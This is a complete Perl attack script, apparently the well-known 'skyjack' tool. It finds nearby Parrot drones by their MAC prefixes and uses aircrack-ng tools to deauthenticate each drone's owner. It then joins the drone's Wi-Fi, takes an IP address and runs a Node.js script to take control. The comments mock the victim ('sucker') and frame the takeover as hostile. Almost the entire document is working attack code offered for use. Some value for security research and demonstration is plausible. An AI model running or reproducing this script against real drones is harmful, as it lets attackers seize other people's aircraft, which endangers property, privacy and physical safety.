skyjack.pl

1. #!/usr/bin/perl
2.  
3. # skyjack, by samy kamkar
4.  
5. # this software detects flying drones, deauthenticates the
6. # owner of the targetted drone, then takes control of the drone
7.  
8. # by samy kamkar, code@samy.pl
9. # http://samy.pl
10. # dec 2, 2013
11.  
12.  
13. # mac addresses of ANY type of drone we want to attack
14. # Parrot owns the 90:03:B7 block of MACs and a few others
15. # see here: http://standards.ieee.org/develop/regauth/oui/oui.txt
16. my @drone_macs = qw/90:03:B7 00:12:1C 90:3A:E6 A0:14:3D 00:12:1C 00:26:7E/;
17.  
18.  
19. use strict;
20.  
21. my $interface  = shift || "wlan1";
22. my $interface2 = shift || "wlan0";
23.  
24. # the JS to control our drone
25. my $controljs  = shift || "drone_control/drone_pwn.js";
26.  
27. # paths to applications
28. my $dhclient    = "dhclient";
29. my $iwconfig    = "iwconfig";
30. my $ifconfig    = "ifconfig";
31. my $airmon  = "airmon-ng";
32. my $aireplay    = "aireplay-ng";
33. my $aircrack    = "aircrack-ng";
34. my $airodump    = "airodump-ng";
35. my $nodejs  = "nodejs";
36.  
37.  
38. # put device into monitor mode
39. sudo($ifconfig, $interface, "down");
40. #sudo($airmon, "start", $interface);
41.  
42. # tmpfile for ap output
43. my $tmpfile = "/tmp/dronestrike";
44. my %skyjacked;
45.  
46. while (1)
47. {
48.  
49.         # show user APs
50.         eval {
51.             local $SIG{INT} = sub { die };
52.             my $pid = open(DUMP, "|sudo $airodump --output-format csv -w $tmpfile $interface >>/dev/null 2>>/dev/null") || die "Can't run airodump ($airodump): $!";
53.             print "pid $pid\n";
54.  
55.             # wait 5 seconds then kill
56.             sleep 2;
57.             print DUMP "\cC";
58.             sleep 1;
59.             sudo("kill", $pid);
60.             sleep 1;
61.             sudo("kill", "-HUP", $pid);
62.             sleep 1;
63.             sudo("kill", "-9", $pid);
64.             sleep 1;
65.             sudo("killall", "-9", $aireplay, $airodump);
66.             #kill(9, $pid);
67.             close(DUMP);
68.         };
69.  
70.         sleep 4;
71.         # read in APs
72.         my %clients;
73.         my %chans;
74.         foreach my $tmpfile1 (glob("$tmpfile*.csv"))
75.         {
76.                 open(APS, "<$tmpfile1") || print "Can't read tmp file $tmpfile1: $!";
77.                 while (<APS>)
78.                 {
79.                     # strip weird chars
80.                     s/[\0\r]//g;
81.  
82.                     foreach my $dev (@drone_macs)
83.                     {
84.                         # determine the channel
85.                         if (/^($dev:[\w:]+),\s+\S+\s+\S+\s+\S+\s+\S+\s+(\d+),.*(ardrone\S+),/)
86.                         {
87.                             print "CHANNEL $1 $2 $3\n";
88.                             $chans{$1} = [$2, $3];
89.                         }
90.  
91.                         # grab our drone MAC and owner MAC
92.                         if (/^([\w:]+).*\s($dev:[\w:]+),/)
93.                         {
94.                             print "CLIENT $1 $2\n";
95.                             $clients{$1} = $2;
96.                         }
97.                     }
98.                 }
99.                 close(APS);
100.                 sudo("rm", $tmpfile1);
101.                 #unlink($tmpfile1);
102.         }
103.         print "\n\n";
104.  
105.         foreach my $cli (keys %clients)
106.         {
107.             print "Found client ($cli) connected to $chans{$clients{$cli}}[1] ($clients{$cli}, channel $chans{$clients{$cli}}[0])\n";
108.  
109.  
110.             # hop onto the channel of the ap
111.             print "Jumping onto drone's channel $chans{$clients{$cli}}[0]\n\n";
112.             #sudo($airmon, "start", $interface, $chans{$clients{$cli}}[0]);
113.             sudo($iwconfig, $interface, "channel", $chans{$clients{$cli}}[0]);
114.  
115.             sleep(1);
116.  
117.             # now, disconnect the TRUE owner of the drone.
118.             # sucker.
119.             print "Disconnecting the true owner of the drone ;)\n\n";
120.             sudo($aireplay, "-0", "3", "-a", $clients{$cli}, "-c", $cli, $interface);
121.  
122.         }  
123.  
124.         sleep(2);
125.  
126.         # go into managed mode
127.         #sudo($airmon, "stop", $interface);
128.  
129.         # connect to each drone and run our zombie client!
130.         foreach my $drone (keys %chans)
131.         {
132.             # ignore drones we've skyjacked before -- thanks to @daviottenheimer for bug discovery!
133.             next if $skyjacked{$chans{$drone}[1]}++;
134.  
135.             print "\n\nConnecting to drone $chans{$drone}[1] ($drone)\n";
136.             sudo($iwconfig, $interface2, "essid", $chans{$drone}[1]);
137.  
138.             print "Acquiring IP from drone for hostile takeover\n";
139.             sudo($dhclient, "-v", $interface2);
140.  
141.             print "\n\nTAKING OVER DRONE\n";
142.             sudo($nodejs, $controljs);
143.                
144.         }
145.  
146.     sleep 5;
147. }
148.  
149.    
150. sub sudo
151. {
152.     print "Running: @_\n";
153.     system("sudo", @_);
154. }